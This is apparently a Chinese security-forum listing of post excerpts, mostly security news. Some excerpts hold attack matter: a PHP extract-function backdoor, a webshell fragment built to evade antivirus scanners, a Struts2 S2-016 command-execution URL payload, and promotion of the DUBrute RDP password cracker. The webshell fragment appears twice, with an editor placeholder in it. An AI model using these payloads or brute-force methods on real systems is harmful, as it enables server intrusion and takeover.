电脑病毒论坛 今日: 0|主题: 1421|排名: 32 

现在一些社交网络和游戏都要求实名制，甚至有的还需要身份证号码，这就需要我们提高防范了，交易上所存在的个人隐私安全问题，大数据时代给个人隐私保护所带来的挑战，看看会有哪些环节泄露了我们自己的秘密吧。 什么是隐私? 隐私是一种与公共利益、群体利益无关，当事人不愿他人知道或他人不便知道的个人信息，(只能公开于 ...

PHP extract 函数后门 Auth:winger[L4F][CGH] Date: 2014-02-24 今天介绍的是一种新的PHP后门: extract 函数后门.复制代码代码如下:extract(PHP 4, PHP 5)extract — 从数组中将变量导入到当前的符号表int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )本函数用 ...

D盾，他不认识二维数组，所以就很轻松绕过了。  对了 还有360哦~  测试了下安全狗，也查不出来，，。 <?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind'](D盾，他不认识二维数组，所以就很轻松绕过了。  对了 还有360哦~  测试了下安全狗，也查不出来，，。 ___FCKpd___0 过D ...

Struts2的S2-016漏洞是之前比较重大的漏洞，也是一些老系统的历史遗留问题 此漏洞影响struts2.0-struts2.3的所有版本，可直接导致服务器被远程控制从而引起数据泄漏,影响巨大 漏洞修复总结有4种方式： 1、升级版本 这也是Apache官方给出的建议，把Struts2的版本升级到2.3.15以上的版本，这种方式只需要替换一些jar包，归纳 ...

在2013年6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞 ，主要问题如下： 可远程执行服务器脚本代码 用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}链接，command goes here可以换成是破坏脚本的 ...

DUBrute是一款强大的远程桌面(3389)密码破解软件，你可以用本附件的扫描功能来自动扫描活跃IP地址，扫描完成后设置好用户名与需要猜解的密码就可以开始全自动工作了。只要你密码设置的好相信会有很大的收获哦。3389是一个远程桌面的端口，很多人为了更方便管理服务器，更新服务器上的资源等，经常会开启3389端口，用nastat ...

在Black Hat 2016大会上，两名比利时的安全研究人员展示了他们今年的研究成果。他们发现了一个WEB攻击方式可以绕过HTTPS加密得到明文信息。他们把这种攻击方式叫做HEIST攻击。HEIST的全称是Encrypted Information can be Stolen through TCP-Windows。大体意思就是通过TCP-Windows协议可以窃取到加密的明文信息。 FreeBuf百 ...

前言 每一段岁月，都会留下属于时代的记忆——那些年，我们所追逐与热衷的安全工具，亦是如此。 在那个信息不对称的年代，安全工具主要是在小圈子内传播。当年天真的我们（脚本小子），以为网络就是江湖，一套完美的工具就是你的兵器——路见不平一声吼，碰到注入亮阿D。 注：由于年代久远，当年的工 ...

Docker是世界领先的软件集装化平台，针对不同的渗透测试类型，我们完全可以使用Docker创建相应的环境。有了Docker容器，你可以把测试环境放到U盘或者云端。 Docker是什么 Docker是一个开源的技术，在软件容器中，你可以创建、运行、测试和部署应用程序。Dcoker可以让你在任何环境中快速、可靠、稳定地部署应用程序。 容器 ...

根据一份普林斯顿大学研究员的报告，电池状态已经在一些网站被用来跟踪你的在线活动。漏洞触发的原因是因为电池状态API。 又是电池？ 去年的时候，斯坦福大学的研究员就曾发表研究，他们通过电池在特定时间内的消耗对手机用户的物理位置进行定位，他们把这种追踪方法命名为PowerSpy，准确度高达90%。PowerSpy利用了蜂窝传 ...

手机病毒非常可怕，前段时间小编的手机就中了一次病毒，让我手机直接差点变砖了，损失惨重啊，不过最后我还是通过自己研究解决了这个问题，不过手机病毒如此恐怖，如何保护手机安全，我今天想和大家分享一下，希望让这些可恶的病毒，再也不能危害到大家，我总结了5个方面，今天和大家分享一下希望有所帮助吧 【诈骗短消息】 ...

人总有一死，现在想想我的八位qq那么值钱，等我死了岂不是更值钱了？我的qq号以后怎么办呢，更别说自媒体管理员，几百万人的粉丝账号怎么办？你考虑过死了以后你的私人账号怎么办吗？ 那你在离开人世之前，考虑过如何处理你的“数字身后事”吗？ 人死了，手机里面的数据就该破解了 据《日经中文网》报道，近期日 ...

网络通讯这么发达，自然只要与时俱进的人都会使用通讯工具，打电话的人越来越少了，其实不只是我们在使用微信等通讯工具，全世界的人都在使用各种通讯APP，包括IS成员，那么，这些IS成员究竟是用什么软件来保密自己的消息呢 7月1日，约5名ISIS武装恐怖分子突袭孟加拉首都达卡一家名为Holey Artisan Bakery餐厅，在12小时 ...

一直以来苹果系统的安全性都是比安卓要高的，但是再安全的系统也免不了漏洞，苹果也一样。最近爆出的新漏洞，这次出现在苹果设备上、编号为CVE-2016-4631的高危漏洞（针对不同操作系统的编号会有差异，这里4631针对的是iOS），要利用起来真是相当容易，因为的确是只要给受害者的苹果设备发条MMS多媒体消息，或者iMessage， ...

最近参加了一个夜跑活动，活动结束后到终点扫描二维码摇一摇，所有人都摇到了纪念奖。可是我想要一等奖啊！谁不想在摇一摇里得到一等奖？一起来看看下面这位黑客的做法，能给你带来什么启发，或者应该怎样防御这样的攻击。 起因：公司年会活动，[微信摇一摇]，第一者给予xxx奖励。 流程:微信公众号关注，回复摇一摇文字返回 ...

还记得我们之前说过的有个白帽子提交了世纪佳缘的漏洞然后被世纪佳缘告了的事情吗？这件事情引起了国内很多白帽黑帽的关注，如今事情又发酵，中国最大的两大漏洞平台——乌云和漏洞盒子同时出现状况。我们想看到这方面的监管和立法能跟上时代，仅此而已。 昨天晚上微博用户@互联网的那点事 爆料，一向在发布互联 ...

未来的互联网最重要的不是速度，不是容量，而是安全。黑客这个词很多人已经耳熟能详，虽然他们是一群神秘的人，但不能判断他们是不是好人，越厉害的往往威胁越大。其实有一群厉害的好人，他们就是“白帽子”。 在全球各地，有这样一群人，他们每天足不出户，只是坐在电脑前；他们不干别的，每天就在各大网站找bug ...

因为接触这个行业，所以在密码方面有深深的恐惧。商场里提供免费wifi，然后也提供支付宝微信支付，竟然有这么多人真的敢用着公用wifi付款买单，市场上共享wifi密码的软件层出不穷，我相信你肯定也用过，可你真的知道一进门不用输密码就连上wifi的原理吗？你能连上别人家的无线，别人能连上你家的吗？ 网络时代，很多人走进 ...

如今，大众的生活越来越离不开网购，网购自然而然成为了当下非常热门的消费方式。支付宝花呗是支付宝提供的第三方信用平台，根据你的消费购物信用给你透支额度，给很多不想办信用卡的人带来了很多方便，但是，最近出现的利用花呗套现的人，却在不知不觉中跌入了骗子的陷阱。屡屡爆出网购诈骗的新闻，不仅让网购一族捏了把汗 ...

南海仲裁这样的闹剧昨天还是宣布了一个可笑的判决，我泱泱大国昨天在海南广东等地派出的各种军队战舰证明这次我们可不是说着玩玩。“若有战，召必回”湿了多少人的眼眶。这边，黑客军团里，也开始借南海问题各种攻击。 最近，一个与东南亚和中国南海问题相关的APT攻击被发现，该APT攻击以包括美国在内的各国政 ...